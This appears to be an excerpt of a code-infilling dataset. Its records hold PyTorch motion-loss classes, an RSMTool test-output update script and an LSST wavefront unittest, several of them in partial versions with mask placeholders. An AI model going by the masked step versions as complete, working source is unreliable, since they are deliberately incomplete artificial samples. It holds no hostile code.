self.right_feet)\n\n feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self.velocity_dim):-self.velocity_dim] *\n self._std[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + \\\n self._mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)])\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact * feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n t = (i + 1) / (num + 1)\n pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n\n # pos_seq SliceBackward\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n # MeanBackward0\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :], init_root_pos[:])\n root_rot_temp = MSE_loss(root_rot_seq[:, :1, :], init_root_rot[:])\n elif idx == seq_num - 1:\n root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos) + \\\n MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot) + \\\n MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] - root_pos_seq[:, idx - 1, :], 2)) \\\n / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] - root_rot_seq[:, idx - 1, :], 2)) \\\n / batch_size / seq_num\n # AddBackward0\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item # DivBackward0\n return loss * 1.5\n",
"step-ids": [
14,
18,
19,
23,
24
]
}
|
[
14,
18,
19,
23,
24
] |
#!/usr/bin/env python
"""
Update the expected test outputs and inputs for rsmsummarize and rsmcompare tests.
This script assumes that you have already run `nose2 -s tests` and ran the entire
test suite. By doing so, the output has been generated under the given outputs
directory. And that is what will be used to generate the new expected output
under `tests/data/experiments`.
#############################################################################################
# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #
#############################################################################################
The script works as follows. For each experiment test:
- The script locates the output under the updated outputs directory.
- New and changed files in this directory are copied over to the expected test
output location.
- Old files in the expected test output are deleted.
- Files that are already in the expected test output and have not changed are
left alone.
- Directories that are missing or empty under the updated test outputs are shown.
- For rsmsummarize and rsmcompare tests, the same logic is also applied to input
data. It is assumed that the input experiments are copies of the experiments
from existing tests.
Note: If running this script results in changes to the inputs for rsmcompare
or rsmsummarize tests, you will need to first re-run the tests for those two
tools and then, potentially, run this script again to update their test outputs.
See `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_
for a further explanation of this process.
The script prints a log detailing the changes made for each experiment test.
:author: Nitin Madnani
:author: Anastassia Loukina
:author: Jeremy Biggs
:organization: ETS
"""
import argparse
import re
import sys
from pathlib import Path
from rsmtool.test_utils import FileUpdater
def main(): # noqa: D103
# set up an argument parser
parser = argparse.ArgumentParser(prog="update_test_files.py")
parser.add_argument(
"--tests",
dest="tests_dir",
required=True,
help="The path to the existing RSMTool tests directory",
)
parser.add_argument(
"--outputs",
dest="outputs_dir",
required=True,
help="The path to the directory containing the updated test "
"outputs (usually `test_outputs`)",
)
# parse given command line arguments
args = parser.parse_args()
# print out a reminder that the user should have run the test suite
run_test_suite = input("Have you already run the whole test suite? (y/n): ")
if run_test_suite == "n":
print("Please run the whole test suite using `nose2 -s tests` before running this script.")
sys.exit(0)
elif run_test_suite != "y":
print("Invalid answer. Exiting.")
sys.exit(1)
else:
print()
# iterate over the given tests directory and find all files named
# `test_experiment_*.py` and get their suffixes for use with the
# FileUpdater object.
suffixes = [
re.sub(r"test_experiment_", "", p.stem) for p in Path("tests").glob("test_experiment_*.py")
]
# instantiate a FileUpdater object
updater = FileUpdater(
test_suffixes=suffixes,
tests_directory=args.tests_dir,
updated_outputs_directory=args.outputs_dir,
)
# run the file updates
updater.run()
# now print the report from the updated object
updater.print_report()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "7e20c61fa30ea93e69a2479e70449638eb52b7bb",
"index": 2964,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport argparse\nimport re\nimport sys\nfrom pathlib import Path\nfrom rsmtool.test_utils import FileUpdater\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n\"\"\"\nUpdate the expected test outputs and inputs for rsmsummarize and rsmcompare tests.\n\nThis script assumes that you have already run `nose2 -s tests` and ran the entire\ntest suite. By doing so, the output has been generated under the given outputs\ndirectory. And that is what will be used to generate the new expected output\nunder `tests/data/experiments`.\n\n#############################################################################################\n# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #\n#############################################################################################\n\nThe script works as follows. For each experiment test:\n- The script locates the output under the updated outputs directory.\n- New and changed files in this directory are copied over to the expected test\n output location.\n- Old files in the expected test output are deleted.\n- Files that are already in the expected test output and have not changed are\n left alone.\n- Directories that are missing or empty under the updated test outputs are shown.\n- For rsmsummarize and rsmcompare tests, the same logic is also applied to input\n data. It is assumed that the input experiments are copies of the experiments\n from existing tests.\n\nNote: If running this script results in changes to the inputs for rsmcompare\nor rsmsummarize tests, you will need to first re-run the tests for those two\ntools and then, potentially, run this script again to update their test outputs.\n\nSee `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_\nfor a further explanation of this process.\n\nThe script prints a log detailing the changes made for each experiment test.\n\n:author: Nitin Madnani\n:author: Anastassia Loukina\n:author: Jeremy Biggs\n\n:organization: ETS\n\"\"\"\n\nimport argparse\nimport re\nimport sys\nfrom pathlib import Path\n\nfrom rsmtool.test_utils import FileUpdater\n\n\ndef main(): # noqa: D103\n # set up an argument parser\n parser = argparse.ArgumentParser(prog=\"update_test_files.py\")\n parser.add_argument(\n \"--tests\",\n dest=\"tests_dir\",\n required=True,\n help=\"The path to the existing RSMTool tests directory\",\n )\n parser.add_argument(\n \"--outputs\",\n dest=\"outputs_dir\",\n required=True,\n help=\"The path to the directory containing the updated test \"\n \"outputs (usually `test_outputs`)\",\n )\n\n # parse given command line arguments\n args = parser.parse_args()\n\n # print out a reminder that the user should have run the test suite\n run_test_suite = input(\"Have you already run the whole test suite? (y/n): \")\n if run_test_suite == \"n\":\n print(\"Please run the whole test suite using `nose2 -s tests` before running this script.\")\n sys.exit(0)\n elif run_test_suite != \"y\":\n print(\"Invalid answer. Exiting.\")\n sys.exit(1)\n else:\n print()\n\n # iterate over the given tests directory and find all files named\n # `test_experiment_*.py` and get their suffixes for use with the\n # FileUpdater object.\n suffixes = [\n re.sub(r\"test_experiment_\", \"\", p.stem) for p in Path(\"tests\").glob(\"test_experiment_*.py\")\n ]\n\n # instantiate a FileUpdater object\n updater = FileUpdater(\n test_suffixes=suffixes,\n tests_directory=args.tests_dir,\n updated_outputs_directory=args.outputs_dir,\n )\n\n # run the file updates\n updater.run()\n\n # now print the report from the updated object\n updater.print_report()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os
import shutil
import numpy as np
import unittest
from lsst.ts.wep.Utility import FilterType, runProgram
from lsst.ts.wep.WepController import WepController
from lsst.ts.wep.ctrlIntf.RawExpData import RawExpData
from lsst.ts.aoclcSim.Utility import getModulePath
from lsst.ts.aoclcSim.WepCmpt import WepCmpt
class TestWepCmpt(unittest.TestCase):
""" Test the WepCmpt class."""
def setUp(self):
self.outputDir = os.path.join(getModulePath(), "tests", "tmp")
self._makeDir(self.outputDir)
isrDirName = "input"
isrDir = os.path.join(self.outputDir, isrDirName)
self._makeDir(isrDir)
self.wepCmpt = WepCmpt(isrDir)
# Set the survey paramters
self.wepCmpt.setFilter(FilterType.REF)
self.wepCmpt.setBoresight(0.0, 0.0)
self.wepCmpt.setRotAng(0.0)
def _makeDir(self, newDir):
os.makedirs(newDir, exist_ok=True)
def tearDown(self):
self.wepCmpt.disconnect()
shutil.rmtree(self.outputDir)
def testGetWepController(self):
wepCntlr = self.wepCmpt.getWepController()
self.assertTrue(isinstance(wepCntlr, WepController))
def testGetFilter(self):
filterType = self.wepCmpt.getFilter()
self.assertEqual(filterType, FilterType.REF)
def testSetFilter(self):
filterType = FilterType.R
self.wepCmpt.setFilter(filterType)
self.assertEqual(self.wepCmpt.getFilter(), filterType)
def testGetBoresight(self):
raInDeg, decInDeg = self.wepCmpt.getBoresight()
self.assertEqual(raInDeg, 0.0)
self.assertEqual(decInDeg, 0.0)
def testSetBoresight(self):
raInDeg = 10.0
decInDeg = 20.0
self.wepCmpt.setBoresight(raInDeg, decInDeg)
raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()
self.assertEqual(raInDegInWepCmpt, raInDeg)
self.assertEqual(decInDegInWepCmpt, decInDeg)
def testGetRotAng(self):
rotAngInDeg = self.wepCmpt.getRotAng()
self.assertEqual(rotAngInDeg, 0.0)
def testSetRotAng(self):
rotAngInDeg = 10.0
self.wepCmpt.setRotAng(rotAngInDeg)
self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)
def testIngestCalibs(self):
sensorNameList = ["R22_S11"]
fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)
numOfFile = self._getNumOfFileInFolder(fakeFlatDir)
self.assertEqual(numOfFile, 6)
self.wepCmpt.ingestCalibs(fakeFlatDir)
numOfFile = self._getNumOfFileInFolder(fakeFlatDir)
self.assertEqual(numOfFile, 0)
def _makeCalibs(self, outputDir, sensorNameList):
fakeFlatDirName = "fake_flats"
fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)
self._makeDir(fakeFlatDir)
detector = " ".join(sensorNameList)
self._genFakeFlat(fakeFlatDir, detector)
return fakeFlatDir
def _genFakeFlat(self, fakeFlatDir, detector):
currWorkDir = os.getcwd()
os.chdir(fakeFlatDir)
self._makeFakeFlat(detector)
os.chdir(currWorkDir)
def _makeFakeFlat(self, detector):
command = "makeGainImages.py"
argstring = "--detector_list %s" % detector
runProgram(command, argstring=argstring)
def _getNumOfFileInFolder(self, folder):
return len([name for name in os.listdir(folder)
if os.path.isfile(os.path.join(folder, name))])
def testGetSkyFile(self):
skyFile = self.wepCmpt.getSkyFile()
self.assertEqual(skyFile, "")
def testSetSkyFile(self):
skyFile = "testSetSkyFile"
self.wepCmpt.setSkyFile(skyFile)
self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)
def testCalculateWavefrontErrorsComCam(self):
# Make the calibration products and do the ingestion
sensorNameList = ["R22_S11", "R22_S12"]
fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)
self.wepCmpt.ingestCalibs(fakeFlatDir)
# Set the skyFile
repackagedDir = os.path.join(getModulePath(), "tests", "testData",
"comcamRepackagedData")
skyFilePath = os.path.join(repackagedDir, "skyComCamInfo.txt")
self.wepCmpt.setSkyFile(skyFilePath)
# Collect the wavefront data
intraRawExpData = RawExpData()
intraObsId = 9006002
intraRawExpDir = os.path.join(repackagedDir, "intra")
intraRawExpData.append(intraObsId, 0, intraRawExpDir)
extraRawExpData = RawExpData()
extraObsId = 9006001
extraRawExpDir = os.path.join(repackagedDir, "extra")
extraRawExpData.append(extraObsId, 0, extraRawExpDir)
# Calculate the wavefront error
wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,
extraRawExpData)
self.assertEqual(len(wfErrMap), 2)
for wfErr in wfErrMap.values():
self.assertEqual(wfErr.argmax(), 1)
if __name__ == "__main__":
# Run the unit test
unittest.main()
|
normal
|
{
"blob_id": "6e434ff213166768a6adadf99dc5d6d8611fa2ba",
"index": 2762,
"step-1": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n <mask token>\n <mask token>\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n <mask token>\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n <mask token>\n <mask token>\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n <mask token>\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n <mask token>\n\n def testSetRotAng(self):\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n currWorkDir = os.getcwd()\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-4": "import os\nimport shutil\nimport numpy as np\nimport unittest\nfrom lsst.ts.wep.Utility import FilterType, runProgram\nfrom lsst.ts.wep.WepController import WepController\nfrom lsst.ts.wep.ctrlIntf.RawExpData import RawExpData\nfrom lsst.ts.aoclcSim.Utility import getModulePath\nfrom lsst.ts.aoclcSim.WepCmpt import WepCmpt\n\n\nclass TestWepCmpt(unittest.TestCase):\n \"\"\" Test the WepCmpt class.\"\"\"\n\n def setUp(self):\n self.outputDir = os.path.join(getModulePath(), 'tests', 'tmp')\n self._makeDir(self.outputDir)\n isrDirName = 'input'\n isrDir = os.path.join(self.outputDir, isrDirName)\n self._makeDir(isrDir)\n self.wepCmpt = WepCmpt(isrDir)\n self.wepCmpt.setFilter(FilterType.REF)\n self.wepCmpt.setBoresight(0.0, 0.0)\n self.wepCmpt.setRotAng(0.0)\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n\n def tearDown(self):\n self.wepCmpt.disconnect()\n shutil.rmtree(self.outputDir)\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n\n def testGetRotAng(self):\n rotAngInDeg = self.wepCmpt.getRotAng()\n self.assertEqual(rotAngInDeg, 0.0)\n\n def testSetRotAng(self):\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n currWorkDir = os.getcwd()\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n 